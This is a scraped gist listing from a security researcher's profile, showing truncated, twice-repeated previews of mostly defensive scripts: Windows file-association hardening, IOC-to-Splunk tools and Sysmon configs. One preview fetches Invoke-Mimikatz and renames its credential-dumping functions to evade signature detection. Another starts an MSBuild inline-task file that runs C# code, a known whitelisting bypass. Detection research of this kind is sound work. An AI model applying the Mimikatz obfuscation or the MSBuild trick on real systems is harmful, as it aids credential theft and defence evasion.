Michael Haag MHaggis

## windows_hardening.cmd
::
::#######################################################################
::
:: Change file associations to protect against common ransomware attacks
:: Note that if you legitimately use these extensions, like .bat, you will now need to execute them manually from cmd or powershell
:: Alternatively, you can right-click on them and hit 'Run as Administrator' but ensure it's a script you want to run :)
:: ---------------------
ftype htafile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
ftype WSHFile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
ftype batfile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"

## IOC Splunker
#! /usr/bin/perl

#
# Script written to pull IP data from openIOC and search Splunk.
#

use strict;
use warnings;
$|=1;

## gist:9caa8e14b2adba7ab0c215a6bf856953
$APIKey = 'KEY'
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$url = "https://www.example.com/api/v1/process?q=process_name:certutil.exe"
$hdrs = @{}
$hdrs.Add("X-Auth-Token",$APIKey)
$response = Invoke-RestMethod -Uri $url -Headers $hdrs


for($i =0; $i -lt $response.total_results; $i++)
{

## msbuildQueueAPC.csproj
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes c# code. -->
    <-- x86 -->
  <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildQueueAPC.csproj -->
  <!- x64 -->
  <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe MSBuildQueueAPC.csproj -->
  <Target Name="Hello">
   <ClassExample />
  </Target>
	<UsingTask

## iocs_to_definition.py
#!/usr/bin/env python

"""
To use me:

1) Make a file full of indicators, one per line, call it indicators.txt.

NOTE: This was written to handle IP addresses. Change line 40 from ipaddr to md5 if passing hashes.

2) python iocs_to_definition.py indicators.txt

## minicars.sh
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1

# Uncomment below two lines to clean comments from all .ps1 files in ./
#find ./ -name "*.ps1" -exec sed -i -e '/^<#/,/^#>/d' {} \;
#find ./ -name "*.ps1" -exec sed -i -e 's/#.*$//' {} \;

sed -i -e '/^<#/,/^#>/d' Invoke-Mimikatz.ps1
sed -i -e 's/#.*$//' Invoke-Mimikatz.ps1
sed -i -e's/DumpCerts/GimmeCerts/g' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCreds/GimmeCreds/g' Invoke-Mimikatz.ps1

## log_nothing.xml
<Sysmon schemaversion="4.50">
    <HashAlgorithms>md5,sha256</HashAlgorithms>
    <EventFiltering>
        <!--Event ID 1: Process creation-->
        <ProcessCreate onmatch="include"></ProcessCreate>
        <!--Event ID 2: A process changed a file creation time-->
        <FileCreateTime onmatch="include"></FileCreateTime>
        <!--Event ID 3: Network connection-->
        <NetworkConnect onmatch="include"></NetworkConnect>
        <!--Event ID 5: Process terminated-->

## GrantedAccess.spl
```
Author: @0x1FFFFF
Date: 1 September, 2021
Goal: Enumerate the human readable permission listed in Sysmon EID 10s.
Note: This type of logic is too heavy to run inline in a search. Use this to generate results and add to a lookup table.
```

$Your_Sysmon_Logic_Here$ EventCode=10
| stats count by GrantedAccess

## Find-Assemblies.ps1
Param([parameter(Mandatory=$true,
   HelpMessage="Directory to search for .NET Assemblies in.")]
   $Directory,
   [parameter(Mandatory=$false,
   HelpMessage="Whether or not to search recursively.")]
   [switch]$Recurse = $false,
   [parameter(Mandatory=$false,
   HelpMessage="Whether or not to include DLLs in the search.")]
   [switch]$DLLs = $false,
   [parameter(Mandatory=$false,

## StartLogging.xml
<Sysmon schemaversion="4.32">
   <!-- Capture all hashes -->
   <HashAlgorithms>*</HashAlgorithms>
   <DnsLookup>False</DnsLookup>
   <ArchiveDirectory>Archive</ArchiveDirectory>
   <EventFiltering>
   		<RuleGroup name="" groupRelation="or">
			<!-- Event ID 1 == Process Creation. Log all newly created processes except -->
			<ProcessCreate onmatch="exclude">
				<Image condition="contains">splunk</Image>
	::
	::#######################################################################
	::
	:: Change file associations to protect against common ransomware attacks
	:: Note that if you legitimately use these extensions, like .bat, you will now need to execute them manually from cmd or powershell
	:: Alternatively, you can right-click on them and hit 'Run as Administrator' but ensure it's a script you want to run :)
	:: ---------------------
	ftype htafile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
	ftype WSHFile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
	ftype batfile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
	#! /usr/bin/perl

	#
	# Script written to pull IP data from openIOC and search Splunk.
	#

	use strict;
	use warnings;
	$\|=1;
	$APIKey = 'KEY'
	[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
	$url = "https://www.example.com/api/v1/process?q=process_name:certutil.exe"
	$hdrs = @{}
	$hdrs.Add("X-Auth-Token",$APIKey)
	$response = Invoke-RestMethod -Uri $url -Headers $hdrs


	for($i =0; $i -lt $response.total_results; $i++)
	{
	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<!-- This inline task executes c# code. -->
	<-- x86 -->
	<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildQueueAPC.csproj -->
	<!- x64 -->
	<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe MSBuildQueueAPC.csproj -->
	<Target Name="Hello">
	<ClassExample />
	</Target>
	<UsingTask
	#!/usr/bin/env python

	"""
	To use me:

	1) Make a file full of indicators, one per line, call it indicators.txt.

	NOTE: This was written to handle IP addresses. Change line 40 from ipaddr to md5 if passing hashes.

	2) python iocs_to_definition.py indicators.txt
	wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1

	# Uncomment below two lines to clean comments from all .ps1 files in ./
	#find ./ -name "*.ps1" -exec sed -i -e '/^<#/,/^#>/d' {} \;
	#find ./ -name ".ps1" -exec sed -i -e 's/#.$//' {} \;

	sed -i -e '/^<#/,/^#>/d' Invoke-Mimikatz.ps1
	sed -i -e 's/#.*$//' Invoke-Mimikatz.ps1
	sed -i -e's/DumpCerts/GimmeCerts/g' Invoke-Mimikatz.ps1
	sed -i -e 's/DumpCreds/GimmeCreds/g' Invoke-Mimikatz.ps1
	<Sysmon schemaversion="4.50">
	<HashAlgorithms>md5,sha256</HashAlgorithms>
	<EventFiltering>
	<!--Event ID 1: Process creation-->
	<ProcessCreate onmatch="include"></ProcessCreate>
	<!--Event ID 2: A process changed a file creation time-->
	<FileCreateTime onmatch="include"></FileCreateTime>
	<!--Event ID 3: Network connection-->
	<NetworkConnect onmatch="include"></NetworkConnect>
	<!--Event ID 5: Process terminated-->
	```
	Author: @0x1FFFFF
	Date: 1 September, 2021
	Goal: Enumerate the human readable permission listed in Sysmon EID 10s.
	Note: This type of logic is too heavy to run inline in a search. Use this to generate results and add to a lookup table.
	```

	$Your_Sysmon_Logic_Here$ EventCode=10
	\| stats count by GrantedAccess
	Param([parameter(Mandatory=$true,
	HelpMessage="Directory to search for .NET Assemblies in.")]
	$Directory,
	[parameter(Mandatory=$false,
	HelpMessage="Whether or not to search recursively.")]
	[switch]$Recurse = $false,
	[parameter(Mandatory=$false,
	HelpMessage="Whether or not to include DLLs in the search.")]
	[switch]$DLLs = $false,
	[parameter(Mandatory=$false,
	<Sysmon schemaversion="4.32">
	<!-- Capture all hashes -->
	<HashAlgorithms>*</HashAlgorithms>
	<DnsLookup>False</DnsLookup>
	<ArchiveDirectory>Archive</ArchiveDirectory>
	<EventFiltering>
	<RuleGroup name="" groupRelation="or">
	<!-- Event ID 1 == Process Creation. Log all newly created processes except -->
	<ProcessCreate onmatch="exclude">
	<Image condition="contains">splunk</Image>